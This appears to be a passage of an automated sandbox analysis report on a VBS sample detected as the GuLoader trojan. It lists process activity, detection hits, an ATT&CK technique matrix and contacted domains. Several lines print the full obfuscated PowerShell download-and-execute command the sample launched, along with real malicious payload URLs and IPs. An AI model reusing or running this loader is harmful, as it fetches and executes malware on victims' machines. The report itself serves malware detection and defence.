'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok RekoeJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FF848F55479 push ebp; iretd 1_2_00007FF848F55538
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5800Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4061Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 940Thread sleep time: -5534023222112862s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: powershell.exe, 00000001.00000002.3370987794.0000029A67FF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWrF%SystemRoot%\system32\mswsock.dllrstl ErfasTypeaeUnderr O.hasPlayb ');$Frstepladserne=gaardspladsens 'Upres$trideHRe veaPhysieStannmMinstoNondupIlma rmuseto Damptpr.geeImidouBommesHuman5No,ex3Uaktu. CyniDInklioTranswSigisnSm.rtlBeclooSemica Vindd Uno.FUp,igi
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Yara detected Powershell download and execute
      Source: Yara matchFile source: amsi64_3504.amsi.csv, type: OTHER
      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3504, type: MEMORYSTR
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok RekoeJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Succesfulde.blo && echo t"Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'anetholes klosetternes venushaar paralalia unyttigst stokkemetoder scanted129 loftrum243 nondissipatedly smashendes sammenlignings areographer articulant prossies vesiculating supermishap adolfine prostyle exerted torsken vespoid svejsere frotteers kvrulanter anetholes klosetternes venushaar paralalia unyttigst stokkemetoder scanted129 loftrum243 nondissipatedly smashendes sammenlignings areographer articulant prossies vesiculating supermishap adolfine prostyle exerted torsken vespoid svejsere frotteers kvrulanter';if (${host}.currentculture) {$bellisserne++;}function gaardspladsens($agerendes){$dafter135=$agerendes.length-$bellisserne;$unburden='substri';$unburden+='ng';for( $unminimizing=5;$unminimizing -lt $dafter135;$unminimizing+=6){$anetholes+=$agerendes.$unburden.invoke( $unminimizing, $bellisserne);}$anetholes;}function sanktionjtr($epigyne){ . ($emanciperingerne) ($epigyne);}$forlngelsers=gaardspladsens 'ol ermtyvekodi.elzcoenoi fronl heldl.nfusanatro/e.cam5unbri.avlsh0koord fo.b(po.omw acceifravrnamentd unpuorealkw zoonsmyxom .ejsn .hudtrecor unend1turne0,npow.zymoc0dacty;predo f,skewantipiseptingu,gn6kundg4brn,b;colla overixforsy6af ta4 malt;fo.ew lawserprepov kom,:barnl1for e2incom1tom,t.te,eo0alloc)b.ytk vill,g skyte retrc kldnk maveochili/l.tre2redis0nazil1tling0c rci0zitta1trkas0nonco1 slu selecfm.ssaiskyd rsi ine ampf .ostochevixdemob/trodd1und.r2ser m1earmu.stra,0exagg ';$fangstknivens=gaardspladsens 'imparupremosaromaeballar unfr-lect,apliengripo,e excenrubritdefin ';$unyttigst=gaardspladsens 'afvrgh danstallesth.stepkommesbevi,: k.nt/dosme/ forgwiter.wpal mwneur..houslavagarlc ccymklovnr hemawannelaskjerd.ndta. svrvcunkinosultampimps/,tammwparanh skva/sp.cksunin,ulo hiborgieostorkrsamtadoptrnitap.lnresunecommerpaxone,hapengowlkdpingeerokkes,usti7affld8unem..,eadmsunharmde eniv,nre>microhforlotsteretkniplpkonklstillg:lingu/rengr/ dimyw susiwbreg.w,onst. samle domsrggepupargui-appelrn,rmaoopryky ethea akkrlgarvk-protoc kandrno.atofe tswfejlmnmesop. decaiembaln irkefresteoanh l/ cifrwchanchattak/,adios alaru.ountbindlsoparaprpian.d scrai thorns.ptiefin.irk ntaechantnvegetd fingei,glosguden7 bekr8abrik.,ydroskri sm lddeim.tte ';$deaktiverende=gaardspladsens 'panor> atol ';$emanciperingerne=gaardspladsens 'bru.hiblideerut,exfyl e ';$almengjordes='loftrum243';$cometlike = gaardspladsens ' h lvequ,drcrespohsura,osniff teser%subcha klunpkun.tptaagedflotaacr.sst tvanacox c%d.mss\auruns nforuskrmscsv jncaiz,eegreensanthof fjerudisjolveksedlitogeblod.. sub,bcentrlteksto olle lati&ultra&tamar sandieophthct ndah c.gaoafplu familtslidb ';sanktionjtr (gaardspladsens 'isos.$impregarri.ltombaorossabgast aso,thlprede:.eseruhanged disksautoomsbeopekontolwretctincrenberigimenzino,eirgded gepurifn ho o=w ter( gam,creto.m excadeloin unch/ ami callit rekvi$obolec stavosuppemsevereunmantthromloghamices,ok rekoe
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'anetholes klosetternes venushaar paralalia unyttigst stokkemetoder scanted129 loftrum243 nondissipatedly smashendes sammenlignings areographer articulant prossies vesiculating supermishap adolfine prostyle exerted torsken vespoid svejsere frotteers kvrulanter anetholes klosetternes venushaar paralalia unyttigst stokkemetoder scanted129 loftrum243 nondissipatedly smashendes sammenlignings areographer articulant prossies vesiculating supermishap adolfine prostyle exerted torsken vespoid svejsere frotteers kvrulanter';if (${host}.currentculture) {$bellisserne++;}function gaardspladsens($agerendes){$dafter135=$agerendes.length-$bellisserne;$unburden='substri';$unburden+='ng';for( $unminimizing=5;$unminimizing -lt $dafter135;$unminimizing+=6){$anetholes+=$agerendes.$unburden.invoke( $unminimizing, $bellisserne);}$anetholes;}function sanktionjtr($epigyne){ . ($emanciperingerne) ($epigyne);}$forlngelsers=gaardspladsens 'ol ermtyvekodi.elzcoenoi fronl heldl.nfusanatro/e.cam5unbri.avlsh0koord fo.b(po.omw acceifravrnamentd unpuorealkw zoonsmyxom .ejsn .hudtrecor unend1turne0,npow.zymoc0dacty;predo f,skewantipiseptingu,gn6kundg4brn,b;colla overixforsy6af ta4 malt;fo.ew lawserprepov kom,:barnl1for e2incom1tom,t.te,eo0alloc)b.ytk vill,g skyte retrc kldnk maveochili/l.tre2redis0nazil1tling0c rci0zitta1trkas0nonco1 slu selecfm.ssaiskyd rsi ine ampf .ostochevixdemob/trodd1und.r2ser m1earmu.stra,0exagg ';$fangstknivens=gaardspladsens 'imparupremosaromaeballar unfr-lect,apliengripo,e excenrubritdefin ';$unyttigst=gaardspladsens 'afvrgh danstallesth.stepkommesbevi,: k.nt/dosme/ forgwiter.wpal mwneur..houslavagarlc ccymklovnr hemawannelaskjerd.ndta. svrvcunkinosultampimps/,tammwparanh skva/sp.cksunin,ulo hiborgieostorkrsamtadoptrnitap.lnresunecommerpaxone,hapengowlkdpingeerokkes,usti7affld8unem..,eadmsunharmde eniv,nre>microhforlotsteretkniplpkonklstillg:lingu/rengr/ dimyw susiwbreg.w,onst. samle domsrggepupargui-appelrn,rmaoopryky ethea akkrlgarvk-protoc kandrno.atofe tswfejlmnmesop. decaiembaln irkefresteoanh l/ cifrwchanchattak/,adios alaru.ountbindlsoparaprpian.d scrai thorns.ptiefin.irk ntaechantnvegetd fingei,glosguden7 bekr8abrik.,ydroskri sm lddeim.tte ';$deaktiverende=gaardspladsens 'panor> atol ';$emanciperingerne=gaardspladsens 'bru.hiblideerut,exfyl e ';$almengjordes='loftrum243';$cometlike = gaardspladsens ' h lvequ,drcrespohsura,osniff teser%subcha klunpkun.tptaagedflotaacr.sst tvanacox c%d.mss\auruns nforuskrmscsv jncaiz,eegreensanthof fjerudisjolveksedlitogeblod.. sub,bcentrlteksto olle lati&ultra&tamar sandieophthct ndah c.gaoafplu familtslidb ';sanktionjtr (gaardspladsens 'isos.$impregarri.ltombaorossabgast aso,thlprede:.eseruhanged disksautoomsbeopekontolwretctincrenberigimenzino,eirgded gepurifn ho o=w ter( gam,creto.m excadeloin unch/ ami callit rekvi$obolec stavosuppemsevereunmantthromloghamices,ok rekoeJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information221
      Scripting      		Valid Accounts12
      Command and Scripting Interpreter      		221
      Scripting      		11
      Process Injection      		1
      Masquerading      		OS Credential Dumping1
      Security Software Discovery      		Remote ServicesData from Local System1
      Encrypted Channel      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      Exploitation for Client Execution      		1
      DLL Side-Loading      		1
      DLL Side-Loading      		21
      Virtualization/Sandbox Evasion      		LSASS Memory1
      Process Discovery      		Remote Desktop ProtocolData from Removable Media3
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts2
      PowerShell      		Logon Script (Windows)Logon Script (Windows)11
      Process Injection      		Security Account Manager21
      Virtualization/Sandbox Evasion      		SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Deobfuscate/Decode Files or Information      		NTDS1
      Application Window Discovery      		Distributed Component Object ModelInput Capture14
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
      Obfuscated Files or Information      		LSA Secrets1
      File and Directory Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading      		Cached Domain Credentials12
      System Information Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      script.vbs29%ReversingLabsScript.Trojan.GuLoader

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://www.erp-royal-crown.info100%Avira URL Cloudphishing
      http://almrwad.com0%Avira URL Cloudsafe
      http://erp-royal-crown.info100%Avira URL Cloudphishing
      https://www.erp-royal-crown.info100%Avira URL Cloudphishing
      https://www.almrwad.com0%Avira URL Cloudsafe
      https://www.erp-royal-crown.info/wh/Subordinerendes78.smi100%Avira URL Cloudphishing
      https://www.erp-royal-crown.info/wh/Subordinerendes78.smiX100%Avira URL Cloudphishing
      http://www.almrwad.com0%Avira URL Cloudsafe
      https://www.almrwad.com/wh/Subordinerendes78.smi100%Avira URL Cloudmalware

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      erp-royal-crown.info
      		148.251.114.233
      		truefalse
        		unknown
        almrwad.com
        		184.171.244.231
        		truefalse
          		unknown
          www.almrwad.com
          		unknown
          		unknownfalse
            		unknown
            www.erp-royal-crown.info
            		unknown
            		unknownfalse
              		unknown

              Contacted URLs

